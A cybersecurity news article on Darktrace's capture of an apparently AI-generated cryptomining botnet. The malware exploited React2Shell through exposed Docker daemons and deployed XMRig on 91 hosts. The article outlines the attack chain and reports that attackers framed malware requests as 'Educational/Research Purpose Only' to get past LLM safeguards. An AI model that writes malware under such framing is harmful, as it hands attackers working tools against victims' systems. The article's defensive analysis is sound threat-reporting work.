AI cybersecurity company Darktrace recently observed a botnet incident involving 91 compromised hosts, in which the threat actors brought in only five British pounds in earnings. Darktrace’s global honeypot network, CloudyPots, captured a completely AI-generated malware sample exploiting the React2Shell vulnerability. The significance of this discovery is not in the damage that was done, but in the method of creation: the malware was fully written by malware, and it was effective. The use of AI-assisted software development, known as vibecoding, is on the rise in offensive cyber operations.
Anatomy of the AI-Built Exploit
The observed attack took place in several stages, beginning with the intentionally exposed CloudyPots Docker daemons as the initial vector. The attacker spawned a container named “python-metrics-collector” that contained a startup command to install prerequisite tools. The payload download continued with a Pastebin list of dependencies, followed by running a Python script from a shortened URL that redirected to a GitHub Gist hosted by “hackedyoulol,” a user who has since been banned from GitHub. Darktrace notes that the payload script lacked a Docker spreader, suggesting a separate, centrally managed spreading mechanism, possibly run from the attacker’s home computer.
The exploit mechanism took advantage of CVE-2025-55182, also known as React2Shell, a remote code execution flaw in React Server Components (RSC). The exploit works when threat actors craft Next.js server component payloads that force exceptions to reveal command output by invoking the child process node module. This enables the attacker to execute commands on the target server. The end result of the recently observed attack was to deploy an XMRig cryptocurrency miner using the Monero wallet and supportxmr mining pool.
The Smoking Gun—How We Know AI Wrote It
The malicious code in this incident contains ample evidence that it was composed by AI. The script contains verbose commentary with multi-line docstrings and thorough inline comments, which are hallmarks of LLM output and stand out as anomalous in malware, where obfuscation is the norm. The specific inclusion of the phrase “Educational/Research Purpose Only” is evidence of jailbreak prompting with the intention to bypass AI safety guardrails.
AI detection analysis by GPTZero flagged the code as likely AI-generated with moderate confidence (76% chance). There are structural elements in the script that differentiate it from the common patterns of human-written code. The coding style favored by LLMs is documentation-heavy and methodical with clean structure, contrasted with typical human-written malware, which is prioritized for speed, deliberately obfuscated, and contains sparse comments.
The Democratization of Cybercrime
This attack campaign is indicative of major trends in the threat landscape. The use of LLMs in cyberattacks has collapsed skill barriers and compressed what once required months of expertise into mere minutes of prompting. AI-assisted attacks have a near-zero marginal cost of generating malware while providing the ability to iterate, customize, and deploy at conversational speed. Framing malicious requests as being for “educational” or “research” purposes enables attackers to bypass AI safety measures, exposing a systemic weakness in generative AI tools.
The shift from high-skill, high-value targeted attacks to high-volume, low-effort campaigns demonstrates the cybercrime landscape trending toward profit through sheer scale rather than sophistication. This attack should be taken as a preview of what’s to come with cyberthreats: Darktrace warns that threat actors are now able to “generate custom malware on demand, modify exploits instantly, and automate every stage of compromise.”
It is vital for enterprises to look at this campaign as a sign of attacks to come, as cyberthreat tactics continue to evolve. “From an organizational perspective, the key takeaway is that AI is fundamentally changing the economics of cybercrime,” says Chrissa Constantine, Senior Cybersecurity Solution Architect at Black Duck. “The focus is no longer solely on highly skilled, well-funded threat groups. Instead, defenders must assume that opportunistic actors can quickly assemble sophisticated tooling using publicly available models and infrastructure.”
Outpacing AI-Armed Adversaries
The evolution of attacker methods presents many challenges for defenders in the fight against threats. Traditional signature-based detection tools fall short in the face of AI-generated malware that can be regenerated with different signatures on demand, defeating hash-based and pattern-matching defenses. Behavioral detection is the new baseline for protecting against modern attacks, as monitoring and identifying anomalous behaviors, like unusual container creation or unexpected outbound connections to mining pools, is now essential.
The React2Shell vulnerability was exploited within hours of disclosure, emphasizing the importance of patching as the window between CVE publication and active exploitation continues to shrink. This attack also highlights the need for continuous attack surface management—exposed Docker daemons, misconfigured APIs, and internet-facing infrastructure are low-hanging fruit that attackers armed with AI will target first. There is an emerging paradigm where AI-powered defensive tools are increasingly imperative to match the speed and adaptability of AI-powered offensive tools.
The Attacker Profile
The breakdown of the attack provides insight into the perpetrator’s environment and capabilities. The IP address is registered to a residential ISP in India, suggesting either a low-sophistication operator or residential proxy use. The persona behind the now-banned GitHub Gist handle “hackedyoulol” reinforces the profile of an amateur actor.
The attacker’s use of Monero also inadvertently exposed the scope and profitability of the campaign, as the supportxmr mining pool provides transparent statistics in spite of the crypto miner’s opaque blockchain. This campaign is an example of a new and rising archetype in cybercrime: the “AI-augmented script kiddie” with low technical skill and high operational output enabled entirely by LLM assistance.
The Five-Pound Warning
While this campaign was only trivially profitable, it is profoundly significant as an indicator of threat trends. Far from an isolated incident, the attack serves as a harbinger of AI-generated malware continuing to grow in sophistication, volume, and impact. It is crucial for CISOs and SOC leaders to prioritize rapid patching, behavioral detection, and attack surface reduction, treating AI-generated threats as a present reality, not a theoretical concern. The next attacker won’t walk away with £5—they'll learn from this campaign.